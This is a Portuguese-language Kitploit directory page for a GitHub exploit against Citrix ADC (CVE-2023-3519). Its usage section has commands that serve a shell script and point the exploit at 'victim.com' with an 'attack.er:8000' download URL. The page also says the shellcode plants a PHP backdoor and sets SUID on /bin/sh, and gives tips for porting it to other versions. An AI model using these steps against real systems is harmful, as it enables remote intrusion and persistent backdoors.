Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2023-3519 — Exploit em Python para CVE-2023-3519 direcionando Citrix ADC com shellcode NASM personalizado, implantação de backdoor PHP e escalonamento de privilégios SUID. | Kitploit
Ferramentas/GitHubGitHub/passwa11/cve-2023-3519
Análise de VulnerabilidadesExploraçãoShellcodeExploração de Aplicações WebFerramenta de Acesso RemotoDesenvolvimento de Payloads
GitHubpasswa11/cve-2023-3519

CVE-2023-3519

Exploit em Python para CVE-2023-3519 direcionando Citrix ADC com shellcode NASM personalizado, implantação de backdoor PHP e escalonamento de privilégios SUID.

Ver Repositório
118há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Citrix ADC RCE CVE-2023-3519

Este exploit usa endereços e shellcode para Citrix VPX 13.1-48.47. Para o artigo completo, clique aqui.

Uso

NASM é necessário para compilar o shellcode.

$ sudo apt install nasm

O shellcode incluído fará o download e executará um script shell de um servidor http(s) remoto. O script aceita 3 argumentos: o host alvo, a porta alvo e a URL de um payload de script shell. Um exemplo de payload que executa id e uname -a antes de se limpar está incluído neste repositório.

$ echo 'id' > a
$ python3 -m http.server &
$ python3 cve-2023-3519.py victim.com 443 attack.er:8000/a

A URL deve ser curta o suficiente para caber no buffer do shellcode, e você receberá um aviso se for muito longa.

Artefatos do shellcode

O shellcode criará um backdoor PHP em /var/netscaler/logon/a.php e definirá o bit SUID em /bin/sh. O payload sh incluído mostra um exemplo de limpeza automática desses artefatos. Note também que o shellcode não fecha seus descritores de arquivo, portanto, explorações repetidas excessivas podem resultar em exaustão de recursos.

Adaptação para outras versões

Para alvos Citrix baseados em FreeBSD, você só precisa encontrar 3 valores: o offset do ponteiro de retorno salvo, um gadget ROP jmp rsp (ou algo equivalente, como push rsp; ret;), e o endereço para saltar a fim de evitar uma falha. Esses parâmetros estão todos hardcoded perto do topo de cve-2023-3519.py.

Baixar ferramenta